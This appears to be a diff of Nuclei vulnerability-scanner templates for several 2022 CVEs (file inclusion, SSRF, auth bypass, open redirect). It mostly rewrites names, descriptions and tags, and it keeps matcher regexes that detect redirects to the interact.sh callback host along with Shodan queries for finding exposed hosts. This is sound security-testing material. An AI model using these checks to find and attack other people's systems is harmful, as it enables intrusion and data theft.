- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/29
|
||||||
|
|
|
@ -1,22 +1,22 @@
|
||||||
id: CVE-2022-1119
|
id: CVE-2022-1119
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: WordPress Simple File List < 3.2.8 - Arbitrary File Retrieval
|
name: WordPress Simple File List <3.2.8 - Local File Inclusion
|
||||||
author: random-robbie
|
author: random-robbie
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
The Wordpress plugin is vulnerable to arbitrary file retrieval via the eeFile parameter found in the ~/includes/ee-downloader.php file due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files.
|
WordPress Simple File List before 3.2.8 is vulnerable to local file inclusion via the eeFile parameter in the ~/includes/ee-downloader.php due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files.
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1119
|
|
||||||
- https://wpscan.com/vulnerability/5551038f-64fb-44d8-bea0-d2f00f04877e
|
- https://wpscan.com/vulnerability/5551038f-64fb-44d8-bea0-d2f00f04877e
|
||||||
- https://wpscan.com/vulnerability/075a3cc5-1970-4b64-a16f-3ec97e22b606
|
- https://wpscan.com/vulnerability/075a3cc5-1970-4b64-a16f-3ec97e22b606
|
||||||
- https://plugins.trac.wordpress.org/browser/simple-file-list/trunk/includes/ee-downloader.php?rev=2071880
|
- https://plugins.trac.wordpress.org/browser/simple-file-list/trunk/includes/ee-downloader.php?rev=2071880
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-1119
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
cve-id: CVE-2022-1119
|
cve-id: CVE-2022-1119
|
||||||
cwe-id: CWE-22
|
cwe-id: CWE-22
|
||||||
tags: cve,cve2022,lfi,wordpress
|
tags: cve,cve2022,lfi,wordpress,wp,wp-plugin
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
@ -25,6 +25,7 @@ requests:
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
|
@ -35,3 +36,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/29
|
||||||
|
|
|
@ -1,21 +1,21 @@
|
||||||
id: CVE-2022-1392
|
id: CVE-2022-1392
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Videos sync PDF <= 1.7.4 - Unauthenticated LFI
|
name: WordPress Videos sync PDF <=1.7.4 - Local File Inclusion
|
||||||
author: Veshraj
|
author: Veshraj
|
||||||
severity: high
|
severity: high
|
||||||
description: The plugin does not validate the p parameter before using it in an include statement, which could lead to Local File Inclusion issues.
|
description: WordPress Videos sync PDF 1.7.4 and prior does not validate the p parameter before using it in an include statement, which could lead to local file inclusion.
|
||||||
reference:
|
reference:
|
||||||
- https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815
|
- https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815
|
||||||
- https://packetstormsecurity.com/files/166534/
|
- https://packetstormsecurity.com/files/166534/
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1392
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-1392
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
cve-id: CVE-2022-1392
|
cve-id: CVE-2022-1392
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
tags: lfi,wp-plugin,cve,cve2022,wp,wordpress,unauth
|
tags: cve,cve2022,lfi,wp-plugin,wp,wordpress,unauth
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
@ -34,3 +34,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/29
|
||||||
|
|
|
@ -1,23 +1,23 @@
|
||||||
id: CVE-2022-1713
|
id: CVE-2022-1713
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Drawio - SSRF on /proxy endpoint
|
name: Drawio <18.0.4 - Server-Side Request Forgery
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
SSRF on /proxy in GitHub repository jgraph/drawio prior to 18.0.4. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information.
|
Drawio prior to 18.0.4 is vulnerable to server-side request forgery. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information.
|
||||||
reference:
|
reference:
|
||||||
- https://huntr.dev/bounties/cad3902f-3afb-4ed2-abd0-9f96a248de11
|
- https://huntr.dev/bounties/cad3902f-3afb-4ed2-abd0-9f96a248de11
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1713
|
|
||||||
- https://github.com/jgraph/drawio/commit/283d41ec80ad410d68634245cf56114bc19331ee
|
- https://github.com/jgraph/drawio/commit/283d41ec80ad410d68634245cf56114bc19331ee
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-1713
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
cve-id: CVE-2022-1713
|
cve-id: CVE-2022-1713
|
||||||
cwe-id: CWE-918
|
cwe-id: CWE-918
|
||||||
metadata:
|
metadata:
|
||||||
|
verified: true
|
||||||
shodan-query: http.title:"Flowchart Maker"
|
shodan-query: http.title:"Flowchart Maker"
|
||||||
verified: "true"
|
|
||||||
tags: cve,cve2022,drawio,ssrf,oss
|
tags: cve,cve2022,drawio,ssrf,oss
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
@ -31,9 +31,11 @@ requests:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- "<title>Flowchart Maker & Online Diagram Software</title>"
|
- "<title>Flowchart Maker & Online Diagram Software</title>"
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: header
|
part: header
|
||||||
words:
|
words:
|
||||||
- "application/octet-stream"
|
- "application/octet-stream"
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/29
|
||||||
|
|
|
@ -1,24 +1,24 @@
|
||||||
id: CVE-2022-21500
|
id: CVE-2022-21500
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Oracle E-Business - Login Panel Registration Accessible
|
name: Oracle E-Business Suite <=12.2 - Authentication Bypass
|
||||||
author: 3th1c_yuk1,tess
|
author: 3th1c_yuk1,tess
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
Vulnerability in Oracle E-Business Suite (component: Manage Proxies). Supported versions that are affected are 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle E-Business Suite. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Suite accessible data. Note: Authentication is required for successful attack, however the user may be self-registered.
|
Oracle E-Business Suite (component: Manage Proxies) 12.1 and 12.2 are susceptible to an easily exploitable vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise it by self-registering for an account. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Suite accessible data.
|
||||||
reference:
|
reference:
|
||||||
- https://orwaatyat.medium.com/my-new-discovery-in-oracle-e-business-login-panel-that-allowed-to-access-for-all-employees-ed0ec4cad7ac
|
- https://orwaatyat.medium.com/my-new-discovery-in-oracle-e-business-login-panel-that-allowed-to-access-for-all-employees-ed0ec4cad7ac
|
||||||
- https://twitter.com/GodfatherOrwa/status/1514720677173026816
|
- https://twitter.com/GodfatherOrwa/status/1514720677173026816
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-21500
|
|
||||||
- https://www.oracle.com/security-alerts/alert-cve-2022-21500.html
|
- https://www.oracle.com/security-alerts/alert-cve-2022-21500.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-21500
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
cve-id: CVE-2022-21500
|
cve-id: CVE-2022-21500
|
||||||
metadata:
|
metadata:
|
||||||
|
verified: true
|
||||||
shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200
|
shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200
|
||||||
verified: "true"
|
tags: cve,cve2022,oracle,misconfig,auth-bypass
|
||||||
tags: oracle,misconfig,cve,cve2022
|
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
@ -37,3 +37,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/29
|
||||||
|
|
|
@ -1,13 +1,13 @@
|
||||||
id: CVE-2022-23347
|
id: CVE-2022-23347
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: BigAnt Software BigAnt Server v5.6.06 - Directory Traversal
|
name: BigAnt Server v5.6.06 - Local File Inclusion
|
||||||
author: 0x_Akoko
|
author: 0x_Akoko
|
||||||
severity: high
|
severity: high
|
||||||
description: BigAnt Software BigAnt Server v5.6.06 was discovered to be vulnerable to directory traversal attacks.
|
description: BigAnt Server v5.6.06 is vulnerable to local file inclusion.
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23347
|
- https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23347
|
||||||
- https://www.cvedetails.com/cve/CVE-2022-23347
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-23347
|
||||||
- http://bigant.com
|
- http://bigant.com
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
@ -15,6 +15,7 @@ info:
|
||||||
cve-id: CVE-2022-23347
|
cve-id: CVE-2022-23347
|
||||||
cwe-id: CWE-22
|
cwe-id: CWE-22
|
||||||
metadata:
|
metadata:
|
||||||
|
verified: true
|
||||||
shodan-query: http.html:"BigAnt"
|
shodan-query: http.html:"BigAnt"
|
||||||
tags: cve,cve2022,bigant,lfi
|
tags: cve,cve2022,bigant,lfi
|
||||||
|
|
||||||
|
@ -36,3 +37,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/29
|
||||||
|
|
|
@ -1,16 +1,18 @@
|
||||||
id: CVE-2022-24856
|
id: CVE-2022-24856
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Flyte Console < 0.52.0 - Server Side Request Forgery (SSRF)
|
name: Flyte Console <0.52.0 - Server-Side Request Forgery
|
||||||
author: pdteam
|
author: pdteam
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery (SSRF) when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur. The patch for this issue deletes the entire `cors_proxy`, as this is not required for console anymore. A patch is available in FlyteConsole version 0.52.0. Disable FlyteConsole availability on the internet as a workaround.
|
FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur.
|
||||||
|
remediation: |
|
||||||
|
The patch for this issue deletes the entire cors_proxy, as this is no longer required for the console. A patch is available in FlyteConsole version 0.52.0, or as a work-around disable FlyteConsole.
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/flyteorg/flyteconsole/security/advisories/GHSA-www6-hf2v-v9m9
|
- https://github.com/flyteorg/flyteconsole/security/advisories/GHSA-www6-hf2v-v9m9
|
||||||
- https://github.com/flyteorg/flyteconsole/pull/389
|
- https://github.com/flyteorg/flyteconsole/pull/389
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-24856
|
|
||||||
- https://hackerone.com/reports/1540906
|
- https://hackerone.com/reports/1540906
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-24856
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
|
@ -27,3 +29,5 @@ requests:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "Interactsh Server"
|
- "Interactsh Server"
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/29
|
||||||
|
|
|
@ -1,11 +1,11 @@
|
||||||
id: CVE-2022-24900
|
id: CVE-2022-24900
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Piano LED Visualizer 1.3 - Directory traversal
|
name: Piano LED Visualizer 1.3 - Local File Inclusion
|
||||||
author: 0x_Akoko
|
author: 0x_Akoko
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
Piano LED Visualizer is software that allows LED lights to light up as a person plays a piano connected to a computer. Version 1.3 and prior are vulnerable to a path traversal attack.
|
Piano LED Visualizer 1.3 and prior are vulnerable to local file inclusion.
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/onlaj/Piano-LED-Visualizer/issues/350
|
- https://github.com/onlaj/Piano-LED-Visualizer/issues/350
|
||||||
- https://vuldb.com/?id.198714
|
- https://vuldb.com/?id.198714
|
||||||
|
@ -16,7 +16,7 @@ info:
|
||||||
cvss-score: 8.6
|
cvss-score: 8.6
|
||||||
cve-id: CVE-2022-24900
|
cve-id: CVE-2022-24900
|
||||||
cwe-id: CWE-610
|
cwe-id: CWE-610
|
||||||
tags: lfi,cve2022,cve,piano,iot,oss
|
tags: cve,cve2022,lfi,piano,iot,oss
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
@ -33,3 +33,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/29
|
||||||
|
|
|
@ -1,13 +1,13 @@
|
||||||
id: CVE-2022-25216
|
id: CVE-2022-25216
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: DVDFab 12 Player/PlayerFab - Arbitrary File Read
|
name: DVDFab 12 Player/PlayerFab - Local File Inclusion
|
||||||
author: 0x_Akoko
|
author: 0x_Akoko
|
||||||
severity: high
|
severity: high
|
||||||
description: An absolute path traversal vulnerability allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access
|
description: DVDFab 12 Player/PlayerFab is susceptible to local file inclusion which allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access.
|
||||||
reference:
|
reference:
|
||||||
- https://www.tenable.com/security/research/tra-2022-07
|
- https://www.tenable.com/security/research/tra-2022-07
|
||||||
- https://www.cvedetails.com/cve/CVE-2022-25216
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-25216
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
|
@ -33,3 +33,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/29
|
||||||
|
|
|
@ -4,10 +4,11 @@ info:
|
||||||
name: u5cms v8.3.5 - Open Redirect
|
name: u5cms v8.3.5 - Open Redirect
|
||||||
author: 0x_Akoko
|
author: 0x_Akoko
|
||||||
severity: medium
|
severity: medium
|
||||||
description: An issue was discovered in u5cms verion 8.3.5 There is a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php.
|
description: |
|
||||||
|
u5cms version 8.3.5 contains a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php.
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/u5cms/u5cms/issues/50
|
- https://github.com/u5cms/u5cms/issues/50
|
||||||
- https://www.cvedetails.com/cve/CVE-2022-32444
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-32444
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
cvss-score: 6.1
|
cvss-score: 6.1
|
||||||
|
@ -25,3 +26,5 @@ requests:
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||||
|
|
||||||
|
# Enhanced by cs 05/30/2022
|
||||||
|
|
Loading…
Reference in New Issue